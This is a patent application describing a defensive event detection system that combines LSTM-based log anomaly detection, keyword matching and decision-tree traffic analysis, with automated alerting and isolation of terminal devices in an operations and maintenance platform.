CN119830273A - Event detection method and device, storage medium and electronic equipment - Google Patents
Event detection method and device, storage medium and electronic equipment Download PDFInfo
- Publication number
- CN119830273A CN119830273A CN202411843210.7A CN202411843210A CN119830273A CN 119830273 A CN119830273 A CN 119830273A CN 202411843210 A CN202411843210 A CN 202411843210A CN 119830273 A CN119830273 A CN 119830273A
- Authority
- CN
- China
- Prior art keywords
- data
- event
- detection result
- detection
- target event
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The application discloses an event detection method and device, a storage medium and electronic equipment. The method comprises the steps of deploying a lightweight security proxy service on terminal equipment, collecting operation data of the terminal equipment through the lightweight security proxy service, executing abnormal value detection operation on system log data in the operation data, determining a first detection result, executing decision tree detection operation on network flow data in the operation data, determining a second detection result, determining whether a target event occurs in the terminal equipment or not based on the first detection result and the second detection result, and generating an alarm message according to the target event when the target event exists, wherein the alarm message comprises a file path for causing the target event to occur, and at least one of the process paths, wherein the file path and the process path are used for locating sources and influence ranges of the target event. The application solves the technical problem of low detection accuracy caused by only relying on a single event detection mode.
Description
Technical Field
The present application relates to the field of computers, and in particular, to an event detection method and apparatus, a storage medium, and an electronic device.
Background
Conventional secure operation systems typically rely on a single event detection approach, such as exception behavior analysis via system logs alone, or monitoring suspicious patterns in network traffic alone. The single detection strategy often cannot cover the diversity of security threats comprehensively, and hidden attack behaviors are easily omitted, so that the detection accuracy is low. Especially in a hybrid IT environment, a single detection mode is difficult to adapt to the complex requirements of different operating systems and application software, the risks of false alarm and false omission are increased, and the overall efficiency of security event detection is reduced.
In summary, the related art has a technical problem that the detection accuracy is low due to the fact that the detection method is only dependent on a single event detection mode.
In view of the above problems, no effective solution has been proposed at present.
Disclosure of Invention
The embodiment of the application provides an event detection method and device, a storage medium and electronic equipment, which at least solve the technical problem of low detection accuracy caused by a single event detection mode.
According to one aspect of the embodiment of the application, an event detection method is provided, which comprises the steps of deploying a lightweight security proxy service on a terminal device, collecting operation data of the terminal device through the lightweight security proxy service, executing an outlier detection operation on system log data in the operation data, determining a first detection result, executing a decision tree detection operation on network traffic data in the operation data, determining a second detection result, determining whether a target event occurs in the terminal device or not based on the first detection result and the second detection result, and generating an alarm message according to the target event in the condition that the target event exists, wherein the alarm message comprises at least one of a file path and a process path which lead to the occurrence of the target event, and the file path and the process path are used for locating the source and the influence range of the target event.
According to another aspect of the embodiment of the application, an event detection system is provided, which comprises a lightweight security agent module, an operation and maintenance management platform module, a log monitoring analysis platform module, an automated operation and maintenance module, an event detection response module and an event detection response module, wherein the lightweight security agent module is used for collecting operation data of terminal equipment and executing instructions sent by the operation and maintenance management platform, the operation and maintenance management platform module is used for managing user access authority and processing command distribution and flow mirroring, the log monitoring analysis platform module is used for executing abnormal value detection operation on system log data in the operation data, determining a first detection result, and executing decision tree detection operation on network flow data in the operation data to determine a second detection result, the automated operation and maintenance module is used for executing batch script execution and automatic configuration deployment on the terminal equipment according to system operation instructions and configuration scripts, the event detection response module is used for determining whether a target event occurs on the terminal equipment or not according to the first detection result and the second detection result, and generating an alarm message according to the target event when the target event exists, wherein the alarm message comprises at least one of file paths which causes the target event to occur, and the file paths and the process paths are used for locating the source and the range of the target event.
According to another aspect of the embodiment of the application, an event detection device is provided, which comprises a deployment module, an acquisition module, an execution module, a determination module and a generation module, wherein the deployment module is used for deploying a lightweight security proxy service on a terminal device, the acquisition module is used for acquiring operation data of the terminal device through the lightweight security proxy service, the execution module is used for executing an abnormal value detection operation on system log data in the operation data, determining a first detection result, executing a decision tree detection operation on network flow data in the operation data and determining a second detection result, the determination module is used for determining whether a target event occurs to the terminal device or not based on the first detection result and the second detection result, and the generation module is used for generating an alarm message according to the target event in the condition that the target event exists, wherein the alarm message comprises at least one of a file path and a process path which lead to the occurrence of the target event, and the file path and the process path are used for locating the source and the influence range of the target event.
Optionally, the device is used for executing abnormal value detection operation on the system log data in the operation data, determining a first detection result, namely processing the system log data according to a long-short-term memory network model to obtain a target threshold range, carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, and determining the first detection result, wherein the first detection result is used for indicating whether the system log data is abnormal or not.
The device is used for determining a second detection result by executing a decision tree detection operation on network traffic data in the operation data in a mode that feature value decomposition operation is conducted on the network traffic data to obtain a target feature vector related to traffic behaviors, the target feature vector is processed by using a pre-trained decision tree model to obtain similar network traffic data, clustering is conducted on the similar network traffic data to obtain the second detection result, wherein the second detection result is used for indicating whether abnormal traffic exists in the network traffic data, and under the condition that network capture data packets are included in the network traffic data, the network capture data packets are converted into image data, and clustering analysis is conducted on the image data to obtain the second detection result.
Optionally, the device is configured to determine whether the terminal device has a target event based on the first detection result and the second detection result, where the method includes at least one of determining that the terminal device has the target event if the first detection result indicates whether the system log data has an abnormal log, and determining that the terminal device has the target event if the second detection result indicates that the network traffic data has an abnormal traffic.
Optionally, the device is used for generating an alarm message according to the target event in the condition that the target event exists, determining at least one of the file path and the process path related to the target event in the condition that the target event exists, determining the event type of the target event based on the file path and/or the process path, and generating the alarm message according to the event type.
Optionally, the device is further used for controlling an operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service under the condition that the event type is a file alarm type so as to acquire system environment information of the terminal equipment and storing the system environment information into a log file under an alarm record directory, wherein the system environment information comprises process information currently running by the terminal equipment.
Optionally, the device is further used for storing the system environment information into the log file and calling a target processing script to process the target event when the event type is a process alarm type and the same history alarm type is acquired, wherein the target processing script is used for executing a preset repairing operation to repair a system error caused by the target event, and setting the forwarding weight of a reverse proxy server of the terminal equipment to be 0 through the lightweight security proxy service when the event type is the process alarm type and the same history alarm type is not acquired.
According to a further aspect of embodiments of the present application, there is also provided a computer-readable storage medium having a computer program stored therein, wherein the computer program is arranged to perform the above-described event detection method when run.
According to yet another aspect of embodiments of the present application, there is provided a computer program product or computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions, so that the computer device performs the event detection method as above.
According to still another aspect of the embodiments of the present application, there is also provided an electronic device including a memory in which a computer program is stored, and a processor configured to execute the event detection method described above by the computer program.
In the embodiment of the application, a lightweight security proxy service is deployed on a terminal device, operation data of the terminal device is acquired through the lightweight security proxy service, an abnormal value detection operation is carried out on system log data in the operation data, a first detection result is determined, a decision tree detection operation is carried out on network traffic data in the operation data, a second detection result is determined, whether a target event occurs in the terminal device is determined based on the first detection result and the second detection result, an alarm message is generated according to the target event, the alarm message comprises a file path which causes the target event to occur, at least one of the file path and the process path is used for positioning the source and the influence range of the target event, and the purposes of improving the event detection accuracy and the response speed are achieved through integrating multi-dimensional data detection and intelligent analysis, so that the technical effects of comprehensive and efficient security event monitoring and alarm are achieved, and the technical problem that the detection accuracy is low only depends on a single event detection mode is solved.
Drawings
The accompanying drawings, which are included to provide a further understanding of the application and are incorporated in and constitute a part of this specification, illustrate embodiments of the application and together with the description serve to explain the application and do not constitute a limitation on the application. In the drawings:
FIG. 1 is a schematic illustration of an application environment for an alternative event detection method according to an embodiment of the application;
FIG. 2 is a flow chart of an alternative event detection method according to an embodiment of the application;
FIG. 3 is a schematic diagram of an alternative event detection method according to an embodiment of the application;
FIG. 4 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application;
FIG. 5 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application;
FIG. 6 is a schematic diagram of an alternative event detection device according to an embodiment of the application;
FIG. 7 is a schematic diagram of an alternative event detection product according to an embodiment of the application;
Fig. 8 is a schematic structural view of an alternative electronic device according to an embodiment of the present application.
Detailed Description
In order that those skilled in the art will better understand the present application, a technical solution in the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in which it is apparent that the described embodiments are only some embodiments of the present application, not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the present application without making any inventive effort, shall fall within the scope of the present application.
It should be noted that the terms "first," "second," and the like in the description and the claims of the present application and the above figures are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments of the application described herein may be implemented in sequences other than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
The application is illustrated below with reference to examples:
According to an aspect of the embodiment of the present application, there is provided an event detection method, optionally, in this embodiment, the event detection method described above may be applied to a hardware environment constituted by the server 101 and the terminal device 103 as shown in fig. 1. As shown in fig. 1, a server 101 is connected to a terminal 103 through a network, and can be used to provide services to the terminal device or an application 107 installed on the terminal device, which may be a video application, an instant messaging application, a browser application, an educational application, a game application, or the like. The database 105 may be provided on a server or independent of the server, and may be used to provide a data storage service for the server 101, for example, a game data storage server, where the above network may include, but is not limited to, a wired network, a wireless network, where the wired network includes a local area network, a metropolitan area network, and a wide area network, where the wireless network includes a bluetooth, WIFI, and other networks implementing wireless communication, and the terminal device 103 may be a terminal configured with an application program, and may include, but is not limited to, at least one of a Mobile phone (such as an Android Mobile phone, an iOS Mobile phone, etc.), a notebook computer, a tablet computer, a palm computer, a MID (Mobile INTERNET DEVICES, a Mobile internet device), a PAD, a desktop computer, a smart television, a smart voice interaction device, a smart home appliance, a vehicle-mounted terminal, an aircraft, a Virtual Reality (VR) terminal, an augmented Reality (Augmented Reality, an AR) terminal, a Mixed Reality (MR) terminal, etc., where the above server may be a single server, or may be a cloud server.
As shown in connection with fig. 1, the above-mentioned event detection method may be performed by an electronic device, which may be a terminal device or a server, and the above-mentioned event detection method may be implemented by the terminal device or the server, respectively, or by both the terminal device and the server.
The above is merely an example, and the present embodiment is not particularly limited.
Optionally, as an optional embodiment, as shown in fig. 2, the event detection method includes:
s202, deploying lightweight security proxy service on terminal equipment;
s204, collecting operation data of the terminal equipment through a lightweight security proxy service;
Optionally, in the embodiment of the present application, the lightweight security proxy service refers to a service module running on a terminal device and responsible for collecting and analyzing system logs, network traffic and running status information, including, but not limited to, CPU usage, memory occupation, file system activity, network connection status, and other data. The service module has compact design, occupies less resources, can stably operate for a long time, and can not obviously influence the normal operation of the terminal equipment.
It should be noted that, the deployment of the lightweight security proxy service can be flexibly adapted to different terminal devices, whether it is a physical server, a virtual machine or a container environment, or even an edge computing node, which is not limited by the present application.
In addition, the collected operation data types can be expanded according to actual requirements, such as system call records, inter-process communication conditions and the like, so as to meet more complex safety monitoring requirements. The operation mode and the data acquisition frequency of the service module are also configurable, and can be adjusted according to the performance and the security policy of the terminal equipment so as to balance the monitoring effect and the resource consumption. In the embodiment of the application, when the utilization rate of the system resource reaches the threshold value, the lightweight security proxy service can also automatically adjust the running state of the lightweight security proxy service so as to reduce the influence on the terminal equipment and ensure the persistence of security monitoring and the stability of system performance.
S206, performing abnormal value detection operation on system log data in the operation data, determining a first detection result, performing decision tree detection operation on network flow data in the operation data, and determining a second detection result;
optionally, in the embodiment of the present application, the system log data refers to various record information generated in the running process of the terminal device, including, but not limited to, a system log of an operating system, an application program log, a security log, and the like, where information such as a device state, a user activity, a system event, and the like is recorded, and is one of important data sources for detecting abnormal behaviors.
The abnormal value detection operation performed on the system log data refers to identifying log records that are significantly different from the normal operation mode through statistical analysis, machine learning or data mining technology, so as to determine whether a potential security threat or abnormal behavior exists. In the embodiment of the application, the first detection result can be generated by constructing a keyword dictionary to detect special keywords, predicting the log trend by using LSTM and setting a threshold range, and the abnormal condition in the system log is reflected.
Optionally, in the embodiment of the present application, the network traffic data refers to packet information generated by the terminal device during network communication, including, but not limited to, a source address, a destination address, a protocol type, a port number, a packet size, and the like of a packet. The decision tree detection operation of the network traffic data refers to analyzing traffic characteristics by using a decision tree algorithm, and identifying abnormal modes in the network traffic, such as abnormal traffic size, nonstandard protocol use, high-frequency specific port access and the like, so as to determine a second detection result. By decomposing the network traffic data into a plurality of characteristic values and utilizing a plurality of decision tree models for combined analysis, whether the network behavior is abnormal can be more accurately judged.
It should be noted that, the specific implementation manners of the outlier detection and the decision tree detection may be diversified, for example, the outlier detection may be performed by using a plurality of methods such as statistical-based outlier detection, machine-learning-based outlier detection, or rule-based outlier detection, and the decision tree detection may also be performed by using different decision tree algorithms, such as ID3, C4.5, CART, or the like, or by combining with other machine learning models, such as Support Vector Machines (SVM), neural networks, and the like, to perform more complex flow analysis.
In addition, parameters such as the execution frequency of the detection operation, the granularity of data acquisition, the period of model training and the like can also be adjusted according to actual scenes and requirements, and the application is not limited to the parameters.
S208, determining whether a target event occurs to the terminal equipment based on the first detection result and the second detection result;
And S210, generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one of a file path and a process path which cause the target event to occur, and the file path and the process path are used for locating the source and the influence range of the target event.
Optionally, in the embodiment of the present application, the first detection result and the second detection result refer to analysis conclusion obtained after performing outlier detection on the system log data and performing decision tree detection on the network traffic data, which include, but are not limited to, abnormal log records occurring on the terminal device, abnormal modes in network behavior, and possible potential security threats.
Illustratively, in the presence of a target event, an alert message is generated that contains specific information, such as at least one of a file path and a process path, that caused the target event to occur. The file path refers to the file location of the abnormal behavior or security event, while the process path points to the running process of the trigger event.
It should be noted that, the generation manner and content of the alarm message may be adjusted according to the nature and severity of the target event. For example, for high risk events, the alert information may be more detailed, including a specific description of the event, the risk level, and suggested countermeasures, while for lower risk anomalies, only basic file or process information may need to be provided. The system can also automatically send messages to different operation and maintenance teams or individuals according to the priority of the alarms, so that important events can be timely processed. In addition, the sending channel of the alarm message is configurable, and the application is not limited to this by various modes such as mail, short message, system notification and the like.
In an exemplary embodiment, taking an application scenario of an enterprise data center as an example, the data center has a large number of servers, and real-time security monitoring and operation and maintenance management are required for the servers. First, a lightweight security proxy service is deployed on each server, which is responsible for continuously observing and collecting running data of the servers, including system log data and network traffic data.
The lightweight security proxy service then periodically collects system log data, such as system start-up records, user login attempts, file access history, process activity information, etc., during the running of the server. The data are then transmitted to a log monitoring analysis platform, which is the core component of the secure operation and maintenance system, for outlier detection operations. Based on historical data and a preset abnormality detection model, the analysis platform can identify log records which are inconsistent with a normal behavior mode, and a first detection result, namely the safety state of a system log layer, is determined.
Meanwhile, the lightweight security proxy service also collects network flow data of the server, including information such as source address, destination address, protocol type, packet size, frequency and the like of the data packet. And transmitting the network traffic data to an operation and maintenance management platform, analyzing the traffic characteristics through a decision tree model, and judging whether abnormal network communication behaviors exist, such as mass data transmission, non-standard protocol use, high-frequency specific port access and the like, so as to determine a second detection result, namely the security state of the network traffic layer.
Then, the security operation and maintenance system comprehensively evaluates whether a target event, such as malware infection, unauthorized access, data leakage and other security problems, occurs to the server based on the first detection result and the second detection result. If a target event is detected, the system will generate detailed alert messages based on the nature and scope of the event. For example, if the system log detects that suspicious files are frequently accessed, the alarm message can contain paths of the files to help operation and maintenance personnel to quickly locate problem files, and if the network traffic detection finds that abnormal data packets exist, the alarm message can provide a process path for triggering events to be convenient for tracing the source of network behaviors.
Further, the generation of the alarm message not only includes specific information of the event, but also includes risk level of the event, suggested countermeasures and the like, so that the operation and maintenance personnel can quickly take action to limit the influence range of the event.
In general, enterprises can construct an efficient and intelligent security operation and maintenance system through deployment and data acquisition, outlier detection and decision tree detection operation of lightweight security proxy services, and target event judgment and alarm message generation based on the results, so that servers of a data center are effectively protected from security threats.
According to the embodiment of the application, the lightweight security proxy service is deployed on the terminal equipment, the operation data of the terminal equipment are acquired through the lightweight security proxy service, the abnormal value detection operation is carried out on the system log data in the operation data, the first detection result is determined, the decision tree detection operation is carried out on the network traffic data in the operation data, the second detection result is determined, whether the terminal equipment has a target event or not is determined based on the first detection result and the second detection result, the alarm message is generated according to the target event under the condition that the target event exists, wherein the alarm message comprises a file path which leads to the occurrence of the target event, at least one of the file path and the process path is used for positioning the source and the influence range of the target event, and the purposes of improving the event detection accuracy and the response speed are achieved through integrating the multi-dimensional data detection and the intelligent analysis, so that the technical effects of comprehensive and efficient security event monitoring and alarm are achieved, and the technical problem that the detection accuracy is low due to the single event detection mode is solved.
The method comprises the steps of executing abnormal value detection operation on system log data in the operation data, determining a first detection result, wherein the first detection result comprises the steps of processing the system log data according to a long-short-term memory network model to obtain a target threshold range, carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, and determining the first detection result, wherein the first detection result is used for indicating whether the system log data is abnormal or not.
Optionally, in the embodiment of the present application, the Long-Short Term Memory network model refers to a deep learning model applied to time series data processing, including but not limited to an LSTM (Long Short-Term Memory) network, which can capture Long-Term dependency relationships in data, and is suitable for analysis of sequence data such as system logs. The keyword dictionary refers to a predefined series of vocabulary sets related to security events, including but not limited to "error," "failed," "warning," etc., for rapid screening of potential anomalies in the system log.
It should be noted that the above-mentioned outlier detection operation may be implemented by various techniques, such as a statistical method, a machine learning model, a data mining technique, and the like, which is not limited by the present application. The processing mode of the system log data can also be diversified, for example, a time sliding window statistical method is adopted to combine with LSTM to predict, or a keyword matching method is used to combine with a rule engine to monitor in real time, and the selection of a specific technical scheme is based on the characteristics of the log data and the requirements of safety detection.
In one exemplary embodiment, after the system log data is collected by the lightweight security proxy service, the operation and maintenance management platform inputs the log data into a long-short-term memory network model, which is trained to predict the fluctuation range of the log data in a normal operation state, i.e., a target threshold range. And triggering the generation of a first detection result once the actual data of the system log exceeds a preset threshold value, namely the system log is regarded as abnormal. Meanwhile, the system can also rapidly screen the log data through the keyword dictionary, and if the log entry containing the high-risk keyword is found, a first detection result is immediately generated to indicate that the safety abnormality exists.
According to the embodiment of the application, a mode of combining the long-short term memory network model processing system log data with the keyword dictionary detection is adopted, so that the efficient identification and positioning of abnormal behaviors in the system log data are realized, the purposes of reducing the safety risk and improving the operation and maintenance efficiency are achieved, and the safe and stable operation of the terminal equipment is ensured.
The method comprises the steps of determining a second detection result by executing decision tree detection operation on network traffic data in the operation data, wherein the decision tree detection operation comprises the steps of performing eigenvalue decomposition operation on the network traffic data to obtain target eigenvectors related to traffic behaviors, processing the target eigenvectors by using a pre-trained decision tree model to obtain similar network traffic data, clustering the similar network traffic data to obtain the second detection result, the second detection result is used for indicating whether abnormal traffic exists in the network traffic data, and under the condition that the network traffic data comprises network capture data packets, converting the network capture data packets into image data, and performing cluster analysis on the image data to obtain the second detection result.
Optionally, in the embodiment of the present application, the above network traffic data refers to data information generated by the terminal device in network communications, including, but not limited to, a source address, a destination address, a protocol type, a packet size, a timestamp, and the like. The above-mentioned eigenvalue decomposition operation is to convert the network traffic data into a plurality of numerical values describing the behavior characteristics thereof, and the target eigenvector is a set of these characteristics, and can systematically reflect the characteristics of the network traffic. The pre-trained decision tree model is used for identifying abnormal network behaviors, and network traffic data similar to known abnormal modes can be found out by analyzing target feature vectors. The clustering analysis is to further group the similar network traffic data based on them so that the data in each group has high similarity, thereby detecting whether an abnormal traffic pattern exists.
It should be noted that, there are various methods for processing and analyzing the network traffic data, such as Support Vector Machines (SVMs), neural Networks (NNs), random Forests (RFs), etc., which are not limited in the present application. The eigenvalue decomposition can be based on different flow indexes, and the specific algorithm of the decision tree model and the cluster analysis can be selected according to actual requirements.
In one exemplary embodiment, the lightweight security proxy service continuously monitors network traffic on the terminal device, collects detailed network data and performs eigenvalue decomposition to generate a target eigenvector. The operation and maintenance management platform then processes the feature vectors using a pre-trained decision tree model to identify network traffic data that is similar to the known anomaly pattern. Further, the similar traffic is grouped by cluster analysis, so as to judge whether abnormal traffic behaviors exist. If the network traffic data contains a network capture packet (pcap packet), the packet is converted into image data, and additional cluster analysis is performed using image processing techniques to detect anomalies in the network in a more intuitive manner.
According to the embodiment of the application, the network flow data is detected by adopting the modes of eigenvalue decomposition, decision tree model processing and cluster analysis, so that the precise identification and early warning of abnormal behaviors in the network flow of the terminal equipment are realized, the purposes of monitoring the network state in real time and protecting the system from network threat are achieved, and the safety and the efficiency of the whole operation and maintenance are effectively improved.
The method for determining whether the terminal device has a target event based on the first detection result and the second detection result includes at least one of determining that the terminal device has the target event when the first detection result indicates whether the system log data has an abnormal log, and determining that the terminal device has the target event when the second detection result indicates that the network traffic data has an abnormal traffic.
Optionally, in the embodiment of the present application, the first detection result refers to an analysis conclusion obtained after performing an outlier detection operation on the system log data, and indicates whether the system log data has abnormal behavior or a sign of a security event, and the second detection result refers to a network activity security state determined after performing a decision tree detection operation on the network traffic data, and determines whether the network traffic data has abnormal traffic.
It should be noted that, the logic for determining whether the terminal device has a target event may be adjusted according to a specific application scenario and a security policy, which is not limited in the present application.
For example, the system may set that the event response is triggered only when the first detection result and the second detection result indicate an abnormality at the same time, or may take a more careful strategy that initiates the event survey procedure even if only one result indicates an abnormality.
In one exemplary embodiment, the secure operation system, after receiving the operation data returned by the lightweight security proxy service, first processes the system log data and the network traffic data to generate a first detection result and a second detection result. If the first detection result indicates that an abnormal log entry appears in the system log data or the second detection result confirms that abnormal traffic exists in the network traffic data, the system immediately judges that the terminal equipment possibly suffers from a target event, such as malicious software infection, unauthorized access or data leakage, and the like. The system will then initiate a corresponding event processing flow including generating an alarm message, triggering a security policy adjustment or initiating an emergency response plan, etc., to quickly isolate and resolve the security issue.
By adopting the embodiment of the application, a double-layer protection mode of executing abnormal value detection on the system log data and executing decision tree detection on the network flow data is adopted, so that the timely detection and early warning of the terminal equipment security event are realized, and the purposes of improving the overall security protection capability of the system and reducing the security threat influence are achieved.
As an alternative, the generating the alarm message according to the target event when the target event exists includes determining at least one of the file path and the process path related to the target event when the target event exists, determining an event type of the target event based on the file path and/or the process path, and generating the alarm message according to the event type.
Optionally, in an embodiment of the present application, the target event refers to any behavior or abnormal situation detected on the terminal device that is inconsistent with the security policy, including but not limited to malware infection, unauthorized access attempts, network attacks, and the like. The file path and the process path refer to specific position information related to the target event on the terminal device, the file path refers to a file which can contain malicious code, and the process path refers to a process for executing abnormal operation.
In one exemplary embodiment, when the lightweight security proxy service detects a target event on the terminal device, such as an abnormal file access pattern or suspicious network traffic, the operation and maintenance management platform immediately analyzes the event details to determine a file path or a process path associated with the target event. Further, an event type is determined based on the path information.
For example, if the file path matches a feature of known malware, the event type may be defined as "malware infection. The system then generates detailed alert messages according to the event type, including event description, time stamp, specific information of the file or process triggering the event, and recommended countermeasures. The alarm message will inform the operation and maintenance personnel and system manager in time through various channels such as interactive platform, mail system and short message service, ensuring quick response.
According to the embodiment of the application, the event type determining mechanism based on the file path and the process path is adopted, so that the fine early warning of the security event is realized, the purposes of improving the response efficiency and reducing the influence of the event are achieved, and important technical support is provided for constructing a stable and safe operation and maintenance environment.
In an alternative scheme, the method further comprises the steps of controlling an operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service under the condition that the event type is a file alarm type so as to acquire system environment information of the terminal equipment, and storing the system environment information into a log file under an alarm record directory, wherein the system environment information comprises process information of the terminal equipment currently running.
Optionally, in an embodiment of the present application, the event type refers to a tag that the security operation and maintenance system classifies a target event, and the file alert type is one of the event types, which indicates that a file or a directory on the terminal device has abnormal behavior or potential security problems. The operation and maintenance management platform is a core component for intensively processing and distributing the security instructions and is responsible for executing the response flow of the file alarming event. The lightweight security proxy service is used as a front-end component on the terminal equipment and is used for receiving and executing the instruction sent by the operation and maintenance management platform, so as to ensure that necessary system environment information is acquired in real time.
It should be noted that, the acquisition range and frequency of the system environment information may be adjusted according to a specific security policy and resource consumption. In addition to running process information, system environment information can be extended to CPU utilization, memory status, network connection status, etc., which is not limited in this application, and is intended to provide an extensible and flexible event response mechanism.
In an exemplary embodiment, when the operation and maintenance management platform receives the file alarm event, it immediately generates a monitoring instruction, and sends the monitoring instruction to the terminal device through the lightweight security proxy service. After receiving the instruction, the proxy service rapidly acquires the current system environment information of the terminal equipment, particularly an running process list comprising a process ID, a name, a resource occupation condition and the like. This information is then recorded in a log file under the alarm record directory to facilitate subsequent event analysis and auditing. The operation and maintenance personnel can be ensured to obtain the complete system environment snapshot when the file alarm occurs, so that the cause and the influence range of the event can be judged more accurately.
By adopting the embodiment of the application, the technology of automatically acquiring and storing the system environment information after the triggering of the file alarm event is adopted, the detailed record of the system state when the event occurs is realized, the purposes of improving the accuracy of the event response and facilitating the tracking and analysis of the safety event are achieved, and the key support is provided for constructing a safer and controllable operation and maintenance system.
As an alternative scheme, the method further comprises the steps of storing the system environment information into the log file and calling a target processing script to process the target event when the event type is a process alarm type and the same history alarm type is acquired, wherein the target processing script is used for executing a preset repairing operation to repair a system error caused by the target event, and setting the forwarding weight of a reverse proxy server of the terminal device to be 0 through the lightweight security proxy service when the event type is the process alarm type and the same history alarm type is not acquired.
Optionally, in the embodiment of the present application, the process alert type refers to an anomaly or a security threat detected by the secure operation system and associated with a process running by the terminal device, including but not limited to starting an illegal process, an anomaly behavior with high resource consumption, an identification of a known malicious behavior, and the like. The system environment information covers the overall state of the terminal device when running, including but not limited to CPU usage, memory occupancy, network connection status, and current active processes, etc. The target processing script is a predefined series of operational instructions aimed at automatically repairing or mitigating system errors caused by process alert events, such as terminating a process, restarting a service, or adjusting a system configuration. The lightweight security proxy service is used as a front-end component on the terminal equipment and is responsible for executing instructions sent by the operation and maintenance management platform, and the instructions comprise dynamic adjustment of forwarding weights of the reverse proxy server.
It should be noted that, the generating and executing processes of the target processing script may be customized according to the actual operation and maintenance requirements and the security policy, which may be a simple one-step operation or a complex multi-step process. Meanwhile, the adjustment strategy of the forwarding weight of the reverse proxy server also considers the balance of service continuity and safety, and the application is not limited to the balance, so as to provide a flexible, efficient and automatic event response mechanism.
In one exemplary embodiment, when the secure operation system recognizes a process alarm event on the terminal device and matches the same event type through the history alarm database, the operation management platform automatically executes a target processing script corresponding to the event type. Before script execution, system environment information is recorded into a log file for subsequent analysis. If no matching event can be found in the historical alert database, the operation and maintenance management platform will reset the reverse proxy forwarding weight of the terminal device to 0 through the lightweight security proxy service in order to prevent the potential security risk from spreading, thereby temporarily isolating the device until the manual auditing and processing is completed.
According to the embodiment of the application, the intelligent response based on the history alarm database and the dynamic adjustment strategy of the reverse proxy server forwarding weight are adopted, so that the automatic processing and isolation of the process alarm event are realized, the purposes of improving the safety, guaranteeing the system stability and reducing the workload of operation and maintenance personnel are achieved, and necessary technical support is provided for constructing a modern and intelligent operation and maintenance system.
In an exemplary embodiment, the event detection method provided by the application can be applied to a lightweight security operation and maintenance system, and particularly, in a traditional operation and maintenance environment, servers are mainly managed in a manual mode, and as the number and types of server hosts are increased, the operation and maintenance management system is difficult to expand and compatible, and the maintenance cost is increased. Meanwhile, the manual operation is easy to cause omission, the efficiency is low, and potential safety hazards are easy to cause.
Based on the above, the lightweight security operation and maintenance system designed and realized by the embodiment of the application performs bypass deployment in an isolated network environment, uniformly realizes the authentication of the identity and the authority of the login user, and realizes the automatic operation and maintenance, the configuration centralized monitoring, the log management and the security policy. Hosts in the hybrid environment are managed efficiently, consistency is ensured, security is improved, and flexibility and controllability of operation and maintenance are enhanced.
Illustratively, FIG. 3 is a schematic diagram of an alternative event detection method according to an embodiment of the present application, as shown in FIG. 3, the system architecture includes a lightweight security agent, a centralized management platform.
And S1, a lightweight security agent is deployed on each protected device, and the agent is responsible for collecting system and network activity data, performing preliminary security analysis and processing and executing instructions of an operation and maintenance management platform. The design of the proxy emphasizes low resource usage and efficiency, supports a variety of operating systems and platforms, and the lightweight security proxy can be implemented based on python, using the python's base library to send and process results for linux commands.
Further, the security agents may be divided into client and server sides. The client end is used for continuously running on a host computer in a system background by using a cycle, the sampling frequency is 10 seconds, the acquisition is carried out once, and for monitoring information more than one day, the sampling frequency is only stored for 1 minute, and the maximum is kept for 30 days. The python script is invoked by the shell of the operating system and is divided into start, stop and state query. When the utilization rate of the system resource is higher and the CPU utilization rate reaches 95%, the proxy process can be automatically ended. And restarting the agent process after the resource utilization rate is recovered to be normal or lower than 90%. and broadcasting the queried host monitoring information back to a server end agent of the operation and maintenance management platform through socket programming by the information collected by the agent process based on the UDP protocol. The operation and maintenance management platform runs a server end of the agent, sends a heartbeat packet to the agent of the host at regular time, confirms the survival state of the agent, sends alarm information to an administrator after the agent goes offline for more than 5 minutes, and displays the online state of the agent in the system.
And S2, the centralized management platform comprises three parts, namely an interaction platform, an operation and maintenance management platform and a log monitoring analysis platform. The three platform modules are mutually matched, have high-efficiency data processing capacity and friendly user interfaces, and support real-time monitoring and report generation.
Specifically, the user accesses the safe operation and maintenance system through the interactive platform, and the operation and maintenance management platform is the core of the safe operation and maintenance system and is used as a hub for system information exchange, and not only processes commands, but also forwards data. The log monitoring and analyzing platform is used for analyzing the detailed information of the collected information and the log.
Illustratively, FIG. 4 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application, as shown in FIG. 4:
S1, an interaction platform, namely, the interaction platform is directly interacted with operation and maintenance personnel, receives operation and maintenance input of a user, and displays functional output of a safety operation and maintenance system, wherein the functional output comprises user information authority, host information visualization, operation and maintenance history and the like. And the operation and maintenance personnel inputs a user name and a password to log in on the operation and maintenance host, performs double-factor authentication through the mobile phone number and enters a safe operation and maintenance system. The interactive platform homepage will display a list of managed hosts according to the user's rights. When logging on to a specific host, the passwords are uniformly collected and managed by the platform, so that the user name is only selected for logging on. If a double auditing mechanism is configured, when a user clicks to log in, a high-authority person is required to input a user name and an instant token (updated once in 30 seconds), and the user can log in normally after confirming that the operation is legal. The interaction platform does not need to be limited to log in an intranet, and can be used for logging in the intranet, the Internet and an operation and maintenance machine room.
